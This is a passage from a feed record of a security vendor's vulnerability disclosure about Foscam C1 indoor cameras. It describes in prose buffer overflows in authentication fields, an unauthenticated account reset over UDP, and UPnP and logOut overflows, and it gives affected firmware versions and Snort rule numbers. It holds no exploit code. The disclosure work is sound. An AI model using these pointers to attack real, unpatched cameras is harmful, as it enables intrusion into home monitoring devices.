UDP/10001. These communications are designed to allow users to display video streams from multiple devices within a centralized web management interface. These devices are vulnerable to an information disclosure vulnerability. An unauthenticated remote attacker could leverage this vulnerability to obtain sensitive device information such as MAC address, camera name, and firmware version. TALOS-2017-0381 has been assigned CVE-2017-2874. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0381/\">here</a>.<br /><h3>Foscam IP Video Camera devMng Multi-Camera Port 10000 Command 0x0002 Username Field Code Execution Vulnerability (TALOS-2017-0382 / CVE-2017-2875)</h3><br />Foscam C1 HD Indoor cameras allow device-to-device communications over UDP/10000 and UDP/10001. These communications are designed to allow users to display video streams from multiple devices within a centralized web management interface. These devices are vulnerable to a buffer overflow condition that can be leveraged by an unauthenticated remote attacker to obtain remote code execution on affected devices. This vulnerability is due to a lack of proper bounds checking on the contents of the username parameter that is submitted during authentication requests. TALOS-2017-0382 has been assigned CVE-2017-2875. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0382/\">here</a>.<br /><h3>Foscam IP Video Camera devMng Multi-Camera Port 10000 Command 0x0002 Password Field Code Execution Vulnerability (TALOS-2017-0383 / CVE-2017-2876)</h3><br />Foscam C1 HD Indoor cameras allow device-to-device communications over UDP/10000 and UDP/10001. These communications are designed to allow users to display video streams from multiple devices within a centralized web management interface. These devices are vulnerable to a buffer overflow condition that can be leveraged by an unauthenticated remote attacker to obtain remote code execution on affected devices. This vulnerability is due to a lack of proper bounds checking on the contents of the password parameter that is submitted during authentication requests. TALOS-2017-0383 has been assigned CVE-2017-2876. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0383/\">here</a>.<br /><h3>Foscam IP Video Camera devMng Multi-Camera Port 10001 Command 0x0064 Empty AuthResetKey Vulnerability (TALOS-2017-0384 / CVE-2017-2877)</h3><br />Foscam C1 HD Indoor cameras allow device-to-device communications over UDP/10000 and UDP/10001. These communications are designed to allow users to display video streams from multiple devices within a centralized web management interface. These devices are vulnerable to a condition in which an unauthenticated attacker could reset user accounts configured on the devices to factory defaults by sending a specially crafted network packet over UDP/10001 to affected devices. Due to a lack of error checking, it is possible to reset these user accounts without ever having to specify a valid 'authResetKey' value within the request to reset the accounts. TALOS-2017-0384 has been assigned CVE-2017-2877. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0384/\">here</a>.<br /><h3>Foscam IP Video Camera CGIProxy.fcgi logOut Code Execution Vulnerability (TALOS-2017-0385 / CVE-2017-2878)</h3><br />Foscam C1 HD Indoor cameras are vulnerable to a buffer overflow condition that is reachable via the 'logOut' command present within the web management interface. This vulnerability could be leveraged by an attacker to obtain remote code execution on affected devices. Exploitation of this vulnerability would require an attacker to authenticate to the device, even with a limited \"Visitor\" account. TALOS-2017-0385 has been assigned CVE-2017-2878. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0385/\">here</a>.<br /><h3>Foscam IP Video Camera UPnP Discovery Code Execution Vulnerability (TALOS-2017-0386 / CVE-2017-2879)</h3><br />Foscam C1 HD Indoor cameras utilize a UPnP implementation that is designed to enable the devices to communicate with the network gateway to facilitate remote access for the web management interface of the device. The UPnP implementation used by the Foscam C1 is vulnerable to a buffer overflow condition that could be leveraged by an attacker to obtain remote code execution on affected devices. By sending a specially crafted UPnP Discovery response to affected devices, a remote attacker could trigger this vulnerability. TALOS-2017-0386 has been assigned CVE-2017-2879. For additional information, please see the advisory <a href=\"http://www.talosintelligence.com/reports/TALOS-2017-0386/\">here</a>.<br /><br /><h2 id=\"h.tgg1wyliengd\">Versions Tested</h2><br />Talos has tested and confirmed that the following Foscam firmware versions are affected:<br /><br />Foscam Indoor IP Camera C1 Series<br />System Firmware Version: 1.9.3.18<br />Application Firmware Version: 2.52.2.43<br />Plug-In Version: 3.3.0.26<br /><br /><h2 id=\"h.sf4d4surofjk\">Conclusion</h2><br />One of the most commonly deployed IP cameras is the Foscam C1. In many cases these devices may be deployed in sensitive locations. They are marketed for use in security monitoring and many use these devices to monitor their homes, children, and pets remotely. As such, it is highly recommended that the firmware running on these devices be kept up-to-date to ensure the integrity of the devices, as well as the confidentiality of the information and environments that they are monitoring. Foscam has released a firmware update, available <a href=\"https://foscam.com/downloads/index.html\">here</a> to resolve these issues. Users of the affected devices should update to this new version as quickly as is operationally feasible to ensure that their devices are not vulnerable. <br /><br /><h2 id=\"h.halfffbm6urf\">Coverage</h2><br />The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.<br /><br /><b>Snort Rules:</b> 42432 - 42434, 43080 - 43082, 43555 - 43558, 43713, 43717. <br /><br /><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/feedburner/Talos?a=YKAUrwmrtDE:l4xB11p4rck:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/feedburner/Talos/~4/YKAUrwmrtDE\" height=\"1\" width=\"1\" alt=\"\"/>", "modified": "2017-11-13T15:43:57", "published": "2017-11-13T07:43:00", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/YKAUrwmrtDE/foscam-multiple-vulns.html", "id": "TALOSBLOG:7BE1D1E5EBE1795D650713F7725AE383", "type": "talosblog", "title": "Vulnerability Spotlight: Multiple Vulnerabilities in Foscam C1 Indoor HD Cameras", "cvss": {"score": 0.0, "vector": "NONE"}}]}
